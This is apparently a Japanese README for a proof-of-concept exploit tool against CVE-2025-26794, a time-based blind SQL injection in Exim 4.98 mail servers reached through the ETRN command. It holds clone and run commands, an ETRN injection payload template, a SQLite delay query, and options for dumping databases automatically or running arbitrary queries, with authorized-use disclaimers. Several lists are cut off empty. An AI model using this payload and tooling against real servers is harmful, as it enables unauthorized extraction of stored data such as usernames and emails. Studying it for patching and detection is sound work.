
Exim 4.98 の CVE-2025-26794 に対する SQL インジェクションのエクスプロイト。時間ベースのブラインド SQLi による自動データ抽出。認可されたペネトレーションテストのみを対象としています。
CVE-2025-26794の概念実証エクスプロイトツール。SQLite DBMストレージ使用時にETRNコマンド経由でExim 4.98メールサーバーに存在するSQLインジェクションの脆弱性を示します。
認可されたセキュリティテスト専用
このツールは、教育目的および認可されたペネトレーションテスト専用に提供されています。許可なくコンピュータシステムにアクセスすることは、以下の法律を含むさまざまな法律で違法となります:
自分が所有していないシステムをテストする前に、明示的な書面による許可が必要です。
作者および貢献者は、このツールの誤用または損害について一切の責任を負いません。
CVE-2025-26794 はExim 4.98のSQLインジェクション脆弱性であり、以下の場合に発生します:
この脆弱性により攻撃者は以下が可能になります:
# Clone the repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit
# Install dependencies (none required - uses standard library only)
pip install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x exploit.py
python3 exploit.py <target> [options]
python3 exploit.py 192.168.1.10 --test-only
python3 exploit.py mail.example.com --auto-dump
python3 exploit.py 10.0.0.5 --interactive
python3 exploit.py 192.168.1.10 --table users --columns
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"
ETRN #',1); <MALICIOUS_QUERY> /*
このペイロードはETRNシリアライズハンドラの不適切なサニタイズを悪用し、SQLiteクエリへのSQLインジェクションを可能にします。
SQLite固有の時間遅延を使用:
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
条件が真の場合、測定可能な遅延(約1〜2秒)が発生します。
╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-26794: Exim SQLi Data Extraction Tool ║
║ FOR AUTHORIZED USE ONLY ║
╚═══════════════════════════════════════════════════════════╝
[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s
[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users
[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email
SQLite DBMを使用してExim 4.98を実行している場合:
エクスプロイトは二分探索を使用して効率的に文字を抽出します:
unicode(): 文字のASCII値を取得substr(): 結果から部分文字列を抽出sqlite_master: スキーマ列挙用のシステムテーブルpragma_table_info(): 列メタデータの抽出以下の分野での貢献を歓迎します:
すべての貢献には以下を含めてください:
このプロジェクトは教育目的のみで公開されています。責任を持って合法的に使用してください。
XploitGh0st
このツールを使用して脆弱性を発見した場合:
忘れないでください:大きな力には大きな責任が伴います。このツールを倫理的かつ合法的に使用してください。
| オプション | 説明 |
|---|
host | ターゲットのホスト名またはIPアドレス(必須) |
-p, --port | SMTPポート(デフォルト: 25) |
-t, --timeout | ソケットタイムアウト(秒)(デフォルト: 30) |
--threshold | 検出のための時間遅延しきい値(デフォルト: 0.8秒) |
--test-only | 脆弱性のテストのみ、データ抽出は行わない |
--auto-dump | データベース構造とデータを自動的にダンプ |
--interactive | 対話型SQLクエリコンソールを起動 |
--table TABLE | 抽出対象の特定テーブル |
--columns | 列名を抽出(--tableと併用) |
--query QUERY | カスタムSQLクエリを実行 |